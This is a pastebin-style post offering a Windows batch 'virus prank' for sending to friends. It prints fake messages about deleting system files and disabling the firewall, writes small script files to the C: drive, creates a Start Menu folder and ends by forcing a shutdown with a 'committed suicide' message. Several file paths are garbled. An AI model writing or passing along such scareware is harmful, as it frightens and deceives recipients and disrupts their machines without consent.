Funny virus prank to send to friends


SUBMITTED BY: Guest

DATE: July 31, 2015, 7:53 p.m.

FORMAT: Bash

SIZE: 2.2 kB

HITS: 475

  1. This is a prank that looks deadly, but really does nothing. Copy everything below the dotted lines, and save the file as virus.bat (make sure you save it as all files and not .txt) It WILL shut off their system unless the type shutdown -a, but that's up to you to tell them or not ;)
  2. -------------------------------------------
  3. title Initiating /root/syscorruption.vbs...
  4. cls
  5. :A
  6. color 0a
  7. cls
  8. @echo off
  9. echo Wscript.Sleep
  10. echo Wscript.Sleep 5000>C:sleep5000.vbs
  11. echo Wscript.Sleep 3000>C:sleep3000.vbs
  12. echo Wscript.Sleep 4000>C:sleep4000.vbs
  13. echo Wscript.Sleep 2000>C:sleep2000.vbs
  14. cd %systemroot%System32
  15. dir
  16. cls
  17. start /w wscript.exe C:sleep3000.vbs
  18. echo Deleting Critical System Files…
  19. echo del *.*
  20. start /w wscript.exe C:sleep3000.vbs
  21. echo Deletion Successful!
  22. start /w wscript.exe C:sleep2000.vbs
  23. echo:
  24. echo:
  25. echo:
  26. echo Deleting Root Partition…
  27. start /w wscript.exe C:sleep2000.vbs
  28. echo del %SYSTEMROOT%
  29. start /w wscript.exe C:sleep4000.vbs
  30. echo Deletion Successful!
  31. start /w wscript.exe C:sleep2000.vbs
  32. echo:
  33. echo:
  34. echo:
  35. echo Creating Directory h4x…
  36. cd C:Documents and SettingsAll UsersStart MenuPrograms
  37. mkdir h4x
  38. start /w wscript.exe C:sleep3000.vbs
  39. echo Directory Creation Successful!
  40. echo:
  41. echo:
  42. echo:
  43. echo Execution Attempt 1
  44. start /w wscript.exe C:sleep3000.vbs
  45. echo cd C:Documents and SettingsAll UsersStart MenuProgramsStartuph4x
  46. echo Error344:Attempt failed. Giving admin permissions to start hax.exe
  47. start /w wscript.exe C:sleep3000.vbs
  48. echo hax.exe is currently running...
  49. echo Virus Executed!
  50. echo:
  51. echo:
  52. echo:
  53. start /w wscript.exe C:sleep2000.vbs
  54. echo Disabling Windows Firewall…
  55. start /w wscript.exe C:sleep2000.vbs
  56. echo Killing all processes…
  57. start /w wscript.exe C:sleep2000.vbs
  58. echo Allowing virus to boot from startup…
  59. start /w wscript.exe C:sleep2000.vbs
  60. echo:
  61. echo:
  62. echo Virus has been executed successfully!
  63. start /w wscript.exe C:sleep2000.vbs
  64. echo:
  65. echo Have fun!
  66. start /w wscript.exe C:sleep2000.vbs
  67. pause
  68. shutdown -s -t 10 -c “Your computer has committed suicide. Have a nice day.”

comments powered by Disqus